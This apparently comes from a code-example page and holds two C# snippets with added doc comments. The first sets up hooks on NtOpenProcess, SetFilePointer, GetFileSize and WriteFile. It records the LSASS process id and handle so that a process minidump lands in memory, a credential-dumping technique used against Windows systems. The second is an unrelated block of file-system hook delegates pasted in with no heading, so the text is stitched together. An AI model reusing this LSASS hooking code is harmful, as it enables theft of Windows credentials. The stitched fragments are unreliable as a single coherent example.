예제 #1
        /// <summary>
        /// Creates the shared <c>HookEngine</c>, registers a <c>DumpContext</c> under
        /// <paramref name="contextHandle"/>, records the target process id and handle, installs the
        /// four detours listed below and enables them in a single call.
        /// </summary>
        /// <param name="contextHandle">Key for the new entry in <c>dumpContexts</c>; an existing entry with the same key is overwritten.</param>
        /// <param name="dumpSizeLimit">Passed unchanged to the <c>DumpContext</c> constructor.</param>
        /// <param name="lsassPid">Stored in the static <c>MiniDumpToMem.lsassPid</c>.</param>
        /// <param name="lsassHandle">Stored in the static <c>MiniDumpToMem.lsassHandle</c>.</param>
        /// <remarks>
        /// Every value written here is static state. A second call replaces the engine, the context and the
        /// detour/original pointers, and nothing in this method disables the hooks installed by the first
        /// call; no teardown counterpart is visible in this excerpt.
        /// </remarks>
        internal static void InitHookEngine(IntPtr contextHandle, uint dumpSizeLimit, int lsassPid, IntPtr lsassHandle)
        {
            hookEngine = new HookEngine();
            dumpContexts[contextHandle] = new DumpContext(dumpSizeLimit);
            MiniDumpToMem.lsassPid = lsassPid;
            MiniDumpToMem.lsassHandle = lsassHandle;

            // Method-group conversions produce the same delegate instances as the explicit
            // `new XxxDelegate(Xxx)` form. They are kept in static fields — presumably so the GC cannot
            // collect them while native code still points at them; confirm against HookEngine.
            // Each detour is paired with the CreateHook call that installs it; the installation order
            // (ntdll first, then the three kernelbase exports) is the same as before.
            NtOpenProcess_detour = NtOpenProcess;
            NtOpenProcess_orig = hookEngine.CreateHook("ntdll.dll", "NtOpenProcess", NtOpenProcess_detour);

            SetFilePointer_detour = SetFilePointer;
            SetFilePointer_orig = hookEngine.CreateHook("kernelbase.dll", "SetFilePointer", SetFilePointer_detour);

            GetFileSize_detour = GetFileSize;
            GetFileSize_orig = hookEngine.CreateHook("kernelbase.dll", "GetFileSize", GetFileSize_detour);

            WriteFile_detour = WriteFile;
            WriteFile_orig = hookEngine.CreateHook("kernelbase.dll", "WriteFile", WriteFile_detour);

            // NOTE(review): EnableHooks is the step that activates the detours created above —
            // presumably CreateHook alone leaves them inactive; verify in HookEngine.
            hookEngine.EnableHooks();
        }
 /// <summary>
 /// Binds each hook method of this instance to its delegate field. Only the delegate objects are created
 /// here; nothing in this method installs or enables a hook — that happens elsewhere. Keeping the
 /// delegates in fields rather than creating them inline is presumably what keeps them alive for the
 /// native side while the hooks are in place (confirm against the installer).
 /// </summary>
 private void InitializeDelegates()
 {
     // Method-group conversions are equivalent to the explicit `new XxxDelegate(XxxHook)` form;
     // assignment order does not matter since each line only sets one field.
     _createFileDelegate = CreateFileHook;
     _createDirectoryDelegate = CreateDirectoryHook;
     _deleteFileDelegate = DeleteFileHook;
     _removeDirectoryDelegate = RemoveDirectoryHook;
     _moveFileDelegate = MoveFileHook;
     _readFileDelegate = ReadFileHook;
     _closeHandleDelegate = CloseHandleHook;
     _getFileAttributesDelegate = GetFileAttributesHook;
     _getFileTypeDelegate = GetFileTypeHook;
     _setFilePointerDelegate = SetFilePointerHook;
     _getFileInformationByHandleDelegate = GetFileInformationByHandleHook;
     _setEndOfFileDelegate = SetEndOfFileHook;

     // Directory enumeration and the custom path hook use delegate types without the "Delegate" suffix.
     _findFirstFile = FindFirstFileHook;
     _findNextFile = FindNextFileHook;
     _findClose = FindCloseHook;
     _tioPathAdd = TioPathAddHook;
 }